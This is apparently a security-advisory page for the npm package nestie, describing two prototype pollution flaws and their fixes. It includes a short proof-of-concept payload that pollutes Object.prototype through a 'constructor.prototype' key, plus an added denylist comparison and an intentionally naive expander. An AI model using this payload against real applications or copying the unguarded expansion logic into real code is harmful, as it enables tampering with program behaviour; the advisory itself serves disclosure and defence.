nestie@1.0.0 vulnerabilities

A tiny (215B) and fast utility to expand a flattened object

Direct Vulnerabilities

Known vulnerabilities in the nestie package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability Vulnerable Version
  • M
Prototype Pollution

nestie is a tiny (224B) and fast utility to expand a flattened object.

Affected versions of this package are vulnerable to Prototype Pollution. A bypass of CVE-2021-25947 is possible, which could lead to pollution of the object prototype.

PoC

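var { nestie } = require("nestie");
// Before the call, a fresh object has no "polluted" property.
console.log("Before : " + {}.polluted);
// The flattened key is expanded through constructor.prototype, i.e. Object.prototype.
nestie({"constructor.prototype.polluted": "Yes! Its Polluted"});
console.log("After : " + {}.polluted);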

How to fix Prototype Pollution?

Upgrade nestie to version 1.0.2 or higher.

Vulnerable versions: <1.0.2
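
The key used in the PoC above passes any check that looks only for `__proto__`, because `constructor.prototype` reaches the same object. The following is an added example, not nestie's code and not part of the advisory: `expand`, `pollutes` and both denylists are hypothetical names, and the `__proto__`-only check is assumed for illustration. It compares that partial denylist with one covering all three key segments.

```javascript
// Added example: a simplified expander written for this note, not nestie's source.
const PARTIAL_DENYLIST = new Set(["__proto__"]);
const FULL_DENYLIST = new Set(["__proto__", "constructor", "prototype"]);

// Expand {"a.b": 1} into {a: {b: 1}}. Keys with a segment in `denylist` are skipped.
function expand(flat, denylist, glue = ".") {
  const out = {};
  for (const flatKey of Object.keys(flat)) {
    const parts = flatKey.split(glue);
    if (parts.some((part) => denylist.has(part))) continue;
    let node = out;
    for (const part of parts.slice(0, -1)) {
      // Like a naive expander, this lookup also follows inherited properties,
      // so the denylist above is the only thing protecting prototypes.
      if (node[part] == null) node[part] = {};
      node = node[part];
    }
    node[parts[parts.length - 1]] = flat[flatKey];
  }
  return out;
}

// Run one payload, report whether Object.prototype gained "polluted", then clean up.
function pollutes(payload, denylist) {
  expand(payload, denylist);
  const hit = Object.prototype.hasOwnProperty.call(Object.prototype, "polluted");
  delete Object.prototype.polluted;
  return hit;
}

// Constructed inputs: the key shape from the PoC above and the __proto__ form.
const viaConstructor = { "constructor.prototype.polluted": "x" };
const viaProto = { "__proto__.polluted": "x" };

console.log("partial denylist, __proto__ key:  ", pollutes(viaProto, PARTIAL_DENYLIST));
console.log("partial denylist, constructor key:", pollutes(viaConstructor, PARTIAL_DENYLIST));
console.log("full denylist, constructor key:   ", pollutes(viaConstructor, FULL_DENYLIST));
console.log(JSON.stringify(expand({ "a.b.c": 1, "a.d": 2 }, FULL_DENYLIST)));
```

The same three-segment check makes a useful regression test for any code that turns attacker-influenced key paths into nested objects.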
  • M
Prototype Pollution

nestie is a tiny (224B) and fast utility to expand a flattened object.

Affected versions of this package are vulnerable to Prototype Pollution in the nestie() function due to a lack of validation of the glue input parameter.

How to fix Prototype Pollution?

Upgrade nestie to version 1.0.1 or higher.

Vulnerable versions: <1.0.1